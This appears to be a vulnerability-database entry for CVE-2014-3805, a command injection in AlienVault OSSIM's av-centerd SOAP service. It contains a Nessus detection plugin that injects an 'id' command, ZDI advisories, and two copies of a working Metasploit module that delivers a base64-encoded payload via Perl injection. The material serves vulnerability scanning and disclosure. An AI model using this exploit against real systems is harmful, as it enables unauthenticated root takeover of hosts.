ID OSSIM_SOAP_4_7_0.NASL Type nessus Reporter This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2022-04-11T00:00:00
Description
The remote host is running a version of AlienVault Open Source Security Information Management (OSSIM) that is affected by a remote code execution vulnerability in the 'av-centerd' SOAP service due to a failure to sanitize user input to the 'get_log_line' method. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code with root privileges.
Note that this version is reportedly also affected by other remote code execution vulnerabilities as well as a SQL injection issue.
However, Nessus did not test for these additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(76193);
script_version("1.12");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2014-3805");
script_bugtraq_id(67998);
script_name(english:"AlienVault OSSIM 'av-centerd' Remote Code Execution");
script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by a remote code execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The remote host is running a version of AlienVault Open Source
Security Information Management (OSSIM) that is affected by a remote
code execution vulnerability in the 'av-centerd' SOAP service due to a
failure to sanitize user input to the 'get_log_line' method. A remote,
unauthenticated attacker can exploit this vulnerability to execute
arbitrary code with root privileges.
Note that this version is reportedly also affected by other remote
code execution vulnerabilities as well as a SQL injection issue.
However, Nessus did not test for these additional issues.");
script_set_attribute(attribute:"see_also", value:"http://forums.alienvault.com/discussion/2690");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-14-199/");
script_set_attribute(attribute:"solution", value:
"Upgrade to 4.7.0 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2014/06/11");
script_set_attribute(attribute:"patch_publication_date", value:"2014/05/06");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/23");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:alienvault:open_source_security_information_management");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("ossim_soap_detect.nbin");
script_require_ports("www/AlienVault OSSIM 'av-centerd' SOAP Service");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
function _soap_create_request(tag, header, body, schema_year)
{
local_var request;
if (isnull(body))
return NULL;
if (isnull(schema_year))
schema_year = "2001";
if (isnull(tag))
tag = "soapenv";
request =
'<?xml version="1.0" encoding="utf-8"?>
<' + tag + ':Envelope ' + tag + ':encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/' + schema_year + '/XMLSchema-instance"
xmlns:' + tag + '="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/' + schema_year + '/XMLSchema">';
if (!isnull(header))
request += '<' + tag + ':Header>' + header + '</' + tag + ':Header>';
request +=
'<' + tag + ':Body>' +
body +
'</' + tag + ':Body>
</' + tag + ':Envelope>';
return request;
}
function soap_send_request(soap_action, url, port, soap_tag, soap_header, request, headers, exit_on_fail)
{
local_var result;
if (isnull(soap_tag))
soap_tag = "soapenv";
if (isnull(headers))
{
headers = make_array(
"Content-type", "application/soap+xml",
"User-Agent", "Nessus SOAP v0.0.1 (Nessus.org)"
);
}
headers["SOAPAction"] = soap_action;
result = http_send_recv3(
method : "POST",
item : url,
port : port,
add_headers : headers,
data : _soap_create_request(tag:soap_tag, header:soap_header, body:request),
exit_on_fail : exit_on_fail
);
return result;
}
app_name = "AlienVault OSSIM 'av-centerd' SOAP Service";
port = get_kb_item_or_exit('www/' + app_name);
method = 'get_log_line';
method_namespace = 'AV/CC/Util';
soap_action = strcat(method_namespace, '#', method);
url = "/av-centerd";
# We append an 'id' command to the log line number, which prior to
# 4.7.0 is not sanitized via int() in the executing perl script.
request =
'<m:' + method + ' xmlns:m="' + method_namespace + '">
<string>All</string>
<string>423d7bea-cfbc-f7ea-fe52-272ff7ede3d2</string>
<string>' + unixtime() + '</string>
<string>' + SCRIPT_NAME + '</string>
<string>/var/log/auth.log</string>
<string>1;id;</string>
</m:' + method + '>';
soap_response =
soap_send_request(
soap_action:soap_action,
url:url,
port:port,
request:request,
exit_on_fail:TRUE);
# Verify that 'id' command executed.
pattern = ">\s*(uid=.*)\s*</item";
match = eregmatch(string:soap_response[2], pattern:pattern);
if (isnull(match)) audit(AUDIT_LISTEN_NOT_VULN, app_name, port);
if (report_verbosity > 0)
{
report =
'\n' + 'Nessus executed "id" by sending the following request :' +
'\n' +
'\n' + crap(data:'-', length:30) + " request " + crap(data:'-', length:30) +
'\n' + chomp(http_last_sent_request()) +
'\n' + crap(data:'-', length:30) + " request " + crap(data:'-', length:30) +
'\n' +
'\n' + 'Which resulted in the following command output :' +
'\n' +
'\n' + data_protection::sanitize_uid(output:match[1]);
security_hole(port:port, extra:report);
}
else security_hole(port);
{"id": "OSSIM_SOAP_4_7_0.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "AlienVault OSSIM 'av-centerd' Remote Code Execution", "description": "The remote host is running a version of AlienVault Open Source Security Information Management (OSSIM) that is affected by a remote code execution vulnerability in the 'av-centerd' SOAP service due to a failure to sanitize user input to the 'get_log_line' method. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code with root privileges.\n\nNote that this version is reportedly also affected by other remote code execution vulnerabilities as well as a SQL injection issue.\nHowever, Nessus did not test for these additional issues.", "published": "2014-06-23T00:00:00", "modified": "2022-04-11T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/76193", "reporter": "This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://forums.alienvault.com/discussion/2690", "https://www.zerodayinitiative.com/advisories/ZDI-14-199/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3805"], "cvelist": ["CVE-2014-3805"], "immutableFields": [], "lastseen": "2022-04-16T14:05:04", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-1722"]}, {"type": "cve", "idList": ["CVE-2014-3804", "CVE-2014-3805", "CVE-2014-5210"]}, {"type": "exploitdb", "idList": ["EDB-ID:33805"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F65030A33A46E083528FF901D4F0FE37"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105048"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144161"]}, {"type": "seebug", "idList": ["SSV:86990"]}, {"type": "zdi", "idList": ["ZDI-14-198", "ZDI-14-199", "ZDI-14-204"]}, {"type": "zdt", "idList": ["1337DAY-ID-28537"]}]}, "score": {"value": 9.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-1722"]}, {"type": "cve", "idList": ["CVE-2014-3805"]}, {"type": "nessus", "idList": ["OSSIM_SOAP_DETECT.NBIN"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813197"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144161"]}, {"type": "seebug", "idList": ["SSV:86990"]}, {"type": "zdi", "idList": ["ZDI-14-204"]}]}, "exploitation": null, "vulnersScore": 9.2}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "pluginID": "76193", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76193);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-3805\");\n script_bugtraq_id(67998);\n\n script_name(english:\"AlienVault OSSIM 'av-centerd' Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of AlienVault Open Source\nSecurity Information Management (OSSIM) that is affected by a remote\ncode execution vulnerability in the 'av-centerd' SOAP service due to a\nfailure to sanitize user input to the 'get_log_line' method. A remote,\nunauthenticated attacker can exploit this vulnerability to execute\narbitrary code with root privileges.\n\nNote that this version is reportedly also affected by other remote\ncode execution vulnerabilities as well as a SQL injection issue.\nHowever, Nessus did not test for these additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://forums.alienvault.com/discussion/2690\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-199/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to 4.7.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:alienvault:open_source_security_information_management\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ossim_soap_detect.nbin\");\n script_require_ports(\"www/AlienVault OSSIM 'av-centerd' SOAP Service\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nfunction _soap_create_request(tag, header, body, schema_year)\n{\n local_var request;\n\n if (isnull(body))\n return NULL;\n\n if (isnull(schema_year))\n schema_year = \"2001\";\n\n if (isnull(tag))\n tag = \"soapenv\";\n\n request =\n '<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <' + tag + ':Envelope ' + tag + ':encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\n xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\n xmlns:xsi=\"http://www.w3.org/' + schema_year + '/XMLSchema-instance\"\n xmlns:' + tag + '=\"http://schemas.xmlsoap.org/soap/envelope/\"\n xmlns:xsd=\"http://www.w3.org/' + schema_year + '/XMLSchema\">';\n\n if (!isnull(header))\n request += '<' + tag + ':Header>' + header + '</' + tag + ':Header>';\n\n request +=\n '<' + tag + ':Body>' +\n body +\n '</' + tag + ':Body>\n </' + tag + ':Envelope>';\n\n return request;\n}\n\nfunction soap_send_request(soap_action, url, port, soap_tag, soap_header, request, headers, exit_on_fail)\n{\n local_var result;\n\n if (isnull(soap_tag))\n soap_tag = \"soapenv\";\n\n if (isnull(headers))\n {\n headers = make_array(\n \"Content-type\", \"application/soap+xml\",\n \"User-Agent\", \"Nessus SOAP v0.0.1 (Nessus.org)\"\n );\n }\n\n headers[\"SOAPAction\"] = soap_action;\n\n result = http_send_recv3(\n method : \"POST\",\n item : url,\n port : port,\n add_headers : headers,\n data : _soap_create_request(tag:soap_tag, header:soap_header, body:request),\n exit_on_fail : exit_on_fail\n );\n\n return result;\n}\n\napp_name = \"AlienVault OSSIM 'av-centerd' SOAP Service\";\nport = get_kb_item_or_exit('www/' + app_name);\n\nmethod = 'get_log_line';\nmethod_namespace = 'AV/CC/Util';\nsoap_action = strcat(method_namespace, '#', method);\nurl = \"/av-centerd\";\n\n# We append an 'id' command to the log line number, which prior to\n# 4.7.0 is not sanitized via int() in the executing perl script.\nrequest =\n'<m:' + method + ' xmlns:m=\"' + method_namespace + '\">\n <string>All</string>\n <string>423d7bea-cfbc-f7ea-fe52-272ff7ede3d2</string>\n <string>' + unixtime() + '</string>\n <string>' + SCRIPT_NAME + '</string>\n <string>/var/log/auth.log</string>\n <string>1;id;</string>\n</m:' + method + '>';\n\nsoap_response =\n soap_send_request(\n soap_action:soap_action,\n url:url,\n port:port,\n request:request,\n exit_on_fail:TRUE);\n\n# Verify that 'id' command executed.\npattern = \">\\s*(uid=.*)\\s*</item\";\nmatch = eregmatch(string:soap_response[2], pattern:pattern);\nif (isnull(match)) audit(AUDIT_LISTEN_NOT_VULN, app_name, port);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n' + 'Nessus executed \"id\" by sending the following request :' +\n '\\n' +\n '\\n' + crap(data:'-', length:30) + \" request \" + crap(data:'-', length:30) +\n '\\n' + chomp(http_last_sent_request()) +\n '\\n' + crap(data:'-', length:30) + \" request \" + crap(data:'-', length:30) +\n '\\n' +\n '\\n' + 'Which resulted in the following command output :' +\n '\\n' +\n '\\n' + data_protection::sanitize_uid(output:match[1]);\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:alienvault:open_source_security_information_management"], "solution": "Upgrade to 4.7.0 or later.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2014-05-06T00:00:00", "vulnerabilityPublicationDate": "2014-06-11T00:00:00", "exploitableWith": []}
{"zdi": [{"lastseen": "2022-01-31T21:06:13", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of AlienVault Ossim. Authentication is not required to exploit this vulnerability. The specific flaw exists within the av-centerd SOAP service. The issue lies in the handling of the get_license requests due to a failure to safely sanitize user data before executing a command. An attacker could leverage this vulnerability to execute code with root privileges.", "cvss3": {}, "published": "2014-06-11T00:00:00", "type": "zdi", "title": "AlienVault OSSIM av-centerd Util.pm get_license Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3805"], "modified": "2014-06-11T00:00:00", "id": "ZDI-14-204", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-204/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:06:16", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of AlienVault Ossim. Authentication is not required to exploit this vulnerability. The specific flaw exists within the av-centerd SOAP service. The issue lies in the handling of the get_log_line requests due to a failure to safely sanitize user data before executing a command. An attacker could leverage this vulnerability to execute code with root privileges.", "cvss3": {}, "published": "2014-06-11T00:00:00", "type": "zdi", "title": "AlienVault OSSIM av-centerd Util.pm get_log_line Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3805"], "modified": "2014-06-11T00:00:00", "id": "ZDI-14-199", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-199/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:06:28", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of AlienVault Ossim. Authentication is not required to exploit this vulnerability. The specific flaw exists within the av-centerd SOAP service. The issue lies in the handling of the update_system/upgrade_pro_web requests due to a failure to safely sanitize user data before executing a command. An attacker could leverage this vulnerability to execute code with root privileges.", "cvss3": {}, "published": "2014-06-11T00:00:00", "type": "zdi", "title": "AlienVault OSSIM av-centerd Util.pm update_system/upgrade_pro_web Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3805"], "modified": "2014-06-11T00:00:00", "id": "ZDI-14-198", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-198/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-09-15T10:22:50", "description": "", "cvss3": {}, "published": "2017-09-14T00:00:00", "type": "packetstorm", "title": "Alienvault OSSIM av-centerd 4.7.0 get_log_line Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-3805"], "modified": "2017-09-14T00:00:00", "id": "PACKETSTORM:144161", "href": "https://packetstormsecurity.com/files/144161/Alienvault-OSSIM-av-centerd-4.7.0-get_log_line-Command-Injection.html", "sourceData": "`require 'msf/core' \nrequire 'rexml/document' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude REXML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Alienvault OSSIM av-centerd Command Injection get_log_line', \n'Description' => %q{ \nThis module exploits a command injection flaw found in the get_log_line \nfunction found within Util.pm. The vulnerability is triggered due to an \nunsanitized $r_file parameter passed to a string which is then executed \nby the system \n}, \n'Author' => [ 'james fitts' ], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-3805' ], \n[ 'OSVDB', '107992' ] \n], \n'Privileged' => true, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => \n{ \n'SSL' => true, \n}, \n'Payload' => \n{ \n'Compat' => { \n'RequiredCmd' => 'perl netcat-e openssl python gawk' \n} \n}, \n'DefaultTarget' => 0, \n'Targets' => \n[ \n['Alienvault <= 4.7.0',{}] \n], \n'DisclosureDate' => 'Jul 18 2014')) \n \nregister_options([Opt::RPORT(40007)], self.class) \nend \n \ndef check \nversion = \"\" \nres = send_soap_request(\"get_dpkg\") \n \nif res && \nres.code == 200 && \nres.headers['SOAPServer'] && \nres.headers['SOAPServer'] =~ /SOAP::Lite/ && \nres.body.to_s =~ /alienvault-center\\s*([\\d\\.]*)-\\d/ \n \nversion = $1 \nend \n \nif version.empty? || version >= \"4.7.0\" \nreturn Exploit::CheckCode::Safe \nelse \nreturn Exploit::CheckCode::Appears \nend \nend \n \ndef build_soap_request(method) \nxml = Document.new \nxml.add_element( \n\"soap:Envelope\", \n{ \n\"xmlns:xsi\" => \"http://www.w3.org/2001/XMLSchema-instance\", \n\"xmlns:soapenc\" => \"http://schemas.xmlsoap.org/soap/encoding/\", \n\"xmlns:xsd\" => \"http://www.w3.org/2001/XMLSchema\", \n\"soap:encodingStyle\" => \"http://schemas.xmlsoap.org/soap/encoding/\", \n\"xmlns:soap\" => \"http://schemas.xmlsoap.org/soap/envelope/\" \n}) \n \nbody = xml.root.add_element(\"soap:Body\") \nm = body.add_element(method, { 'xmlns' => \"AV/CC/Util\" }) \n \nargs = [] \nargs[0] = m.add_element(\"c-gensym3\", {'xsi:type' => 'xsd:string'}) \nargs[0].text = \"All\" \n \nargs[1] = m.add_element(\"c-gensym5\", {'xsi:type' => 'xsd:string'}) \nargs[1].text = \"423d7bea-cfbc-f7ea-fe52-272ff7ede3d2\" \n \nargs[2] = m.add_element(\"c-gensym7\", {'xsi:type' => 'xsd:string'}) \nargs[2].text = \"#{datastore['RHOST']}\" \n \nargs[3] = m.add_element(\"c-gensym9\", {'xsi:type' => 'xsd:string'}) \nargs[3].text = \"#{rand_text_alpha(4 + rand(4))}\" \n \nargs[4] = m.add_element(\"c-gensym11\", {'xsi:type' => 'xsd:string'}) \nargs[4].text = \"/var/log/auth.log\" \n \nargs[5] = m.add_element(\"c-gensym13\", {'xsi:type' => 'xsd:string'}) \nperl_payload = \"system(decode_base64\" \nperl_payload += \"(\\\"#{Rex::Text.encode_base64(payload.encoded)}\\\"))\" \nargs[5].text = \"1;perl -MMIME::Base64 -e '#{perl_payload}';\" \n \nxml.to_s \nend \n \ndef send_soap_request(method, timeout=20) \nsoap = build_soap_request(method) \n \nres = send_request_cgi({ \n'uri' => '/av-centerd', \n'method' => 'POST', \n'ctype' => 'text/xml; charset=UTF-8', \n'data' => soap, \n'headers' => { \n'SOAPAction' => \"\\\"AV/CC/Util##{method}\\\"\" \n} \n}, timeout) \n \nres \nend \n \ndef exploit \nsend_soap_request(\"get_log_line\", 1) \nend \nend \n__END__ \n \n/usr/share/alienvault-center/lib/AV/CC/Util.pm \n \nsub get_log_line { \nmy ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file, $number_lines ) \n= @_; \n \nverbose_log_file( \n\"GET LOG LINE : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$r_file)\" \n); \n \nmy @ret = (\"$systemuuid\"); \n \nif ( $r_file =~ /\\.\\./ ){ \npush(@ret,\"File not auth\"); \nreturn \\@ret; \n} \n \nif ( $number_lines <= 0) { \npush(@ret,\"Error in number lines\"); \nreturn \\@ret; \n} \n \nif (( $r_file =~ /^\\/var\\/log\\// ) or ( $r_file =~ /^\\/var\\/ossec\\/alerts\\// ) or ( $r_file =~ /^\\/var\\/ossec\\/logs\\// )){ \nif (! -f \"$r_file\" ){ \npush(@ret,\"File not found\"); \nreturn \\@ret; \n} \npush(@ret,\"ready\"); \n \nmy $command = \"tail -$number_lines $r_file\"; \n#push(@ret,\"$command\"); \n#my @content = `tail -$number_lines $r_file`; \nmy @content = `$command`; \npush(@ret,@content); \nreturn \\@ret; \n} \nelse { \npush(@ret,\"path not auth\"); \nreturn \\@ret; \n} \n} \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144161/alientvaultossim470-exec.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-09T11:40:49", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2017-09-13T00:00:00", "type": "zdt", "title": "Alienvault OSSIM av-centerd 4.7.0 - (get_log_line) Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-3805"], "modified": "2017-09-13T00:00:00", "id": "1337DAY-ID-28537", "href": "https://0day.today/exploit/description/28537", "sourceData": "require 'msf/core'\r\nrequire 'rexml/document'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include REXML\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Alienvault OSSIM av-centerd Command Injection get_log_line',\r\n 'Description' => %q{\r\n This module exploits a command injection flaw found in the get_log_line\r\n function found within Util.pm. The vulnerability is triggered due to an\r\n unsanitized $r_file parameter passed to a string which is then executed\r\n by the system\r\n },\r\n 'Author' => [ 'james fitts' ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-3805' ],\r\n [ 'OSVDB', '107992' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true,\r\n },\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'RequiredCmd' => 'perl netcat-e openssl python gawk'\r\n }\r\n },\r\n 'DefaultTarget' => 0,\r\n 'Targets' =>\r\n [\r\n ['Alienvault <= 4.7.0',{}]\r\n ],\r\n 'DisclosureDate' => 'Jul 18 2014'))\r\n \r\n register_options([Opt::RPORT(40007)], self.class)\r\n end\r\n \r\n def check\r\n version = \"\"\r\n res = send_soap_request(\"get_dpkg\")\r\n \r\n if res &&\r\n res.code == 200 &&\r\n res.headers['SOAPServer'] &&\r\n res.headers['SOAPServer'] =~ /SOAP::Lite/ &&\r\n res.body.to_s =~ /alienvault-center\\s*([\\d\\.]*)-\\d/\r\n \r\n version = $1\r\n end\r\n \r\n if version.empty? || version >= \"4.7.0\"\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n \r\n def build_soap_request(method)\r\n xml = Document.new\r\n xml.add_element(\r\n \"soap:Envelope\",\r\n {\r\n \"xmlns:xsi\" => \"http://www.w3.org/2001/XMLSchema-instance\",\r\n \"xmlns:soapenc\" => \"http://schemas.xmlsoap.org/soap/encoding/\",\r\n \"xmlns:xsd\" => \"http://www.w3.org/2001/XMLSchema\",\r\n \"soap:encodingStyle\" => \"http://schemas.xmlsoap.org/soap/encoding/\",\r\n \"xmlns:soap\" => \"http://schemas.xmlsoap.org/soap/envelope/\"\r\n })\r\n \r\n body = xml.root.add_element(\"soap:Body\")\r\n m = body.add_element(method, { 'xmlns' => \"AV/CC/Util\" })\r\n \r\n args = []\r\n args[0] = m.add_element(\"c-gensym3\", {'xsi:type' => 'xsd:string'})\r\n args[0].text = \"All\"\r\n \r\n args[1] = m.add_element(\"c-gensym5\", {'xsi:type' => 'xsd:string'})\r\n args[1].text = \"423d7bea-cfbc-f7ea-fe52-272ff7ede3d2\"\r\n \r\n args[2] = m.add_element(\"c-gensym7\", {'xsi:type' => 'xsd:string'})\r\n args[2].text = \"#{datastore['RHOST']}\"\r\n \r\n args[3] = m.add_element(\"c-gensym9\", {'xsi:type' => 'xsd:string'})\r\n args[3].text = \"#{rand_text_alpha(4 + rand(4))}\"\r\n \r\n args[4] = m.add_element(\"c-gensym11\", {'xsi:type' => 'xsd:string'})\r\n args[4].text = \"/var/log/auth.log\"\r\n \r\n args[5] = m.add_element(\"c-gensym13\", {'xsi:type' => 'xsd:string'})\r\n perl_payload = \"system(decode_base64\"\r\n perl_payload += \"(\\\"#{Rex::Text.encode_base64(payload.encoded)}\\\"))\"\r\n args[5].text = \"1;perl -MMIME::Base64 -e '#{perl_payload}';\"\r\n \r\n xml.to_s\r\n end\r\n \r\n def send_soap_request(method, timeout=20)\r\n soap = build_soap_request(method)\r\n \r\n res = send_request_cgi({\r\n 'uri' => '/av-centerd',\r\n 'method' => 'POST',\r\n 'ctype' => 'text/xml; charset=UTF-8',\r\n 'data' => soap,\r\n 'headers' => {\r\n 'SOAPAction' => \"\\\"AV/CC/Util##{method}\\\"\"\r\n }\r\n }, timeout)\r\n \r\n res\r\n end\r\n \r\n def exploit\r\n send_soap_request(\"get_log_line\", 1)\r\n end\r\nend\r\n__END__\r\n \r\n/usr/share/alienvault-center/lib/AV/CC/Util.pm\r\n \r\nsub get_log_line {\r\n my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file, $number_lines )\r\n = @_;\r\n \r\n verbose_log_file(\r\n \"GET LOG LINE : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$r_file)\"\r\n );\r\n \r\n my @ret = (\"$systemuuid\");\r\n \r\n if ( $r_file =~ /\\.\\./ ){\r\n push(@ret,\"File not auth\");\r\n return \\@ret;\r\n }\r\n \r\n if ( $number_lines <= 0) {\r\n push(@ret,\"Error in number lines\");\r\n return \\@ret;\r\n }\r\n \r\n if (( $r_file =~ /^\\/var\\/log\\// ) or ( $r_file =~ /^\\/var\\/ossec\\/alerts\\// ) or ( $r_file =~ /^\\/var\\/ossec\\/logs\\// )){\r\n if (! -f \"$r_file\" ){\r\n push(@ret,\"File not found\");\r\n return \\@ret;\r\n }\r\n push(@ret,\"ready\");\r\n \r\n my $command = \"tail -$number_lines $r_file\";\r\n #push(@ret,\"$command\");\r\n #my @content = `tail -$number_lines $r_file`;\r\n my @content = `$command`;\r\n push(@ret,@content);\r\n return \\@ret;\r\n }\r\n else {\r\n push(@ret,\"path not auth\");\r\n return \\@ret;\r\n }\r\n}\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/28537", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:40:46", "description": "No 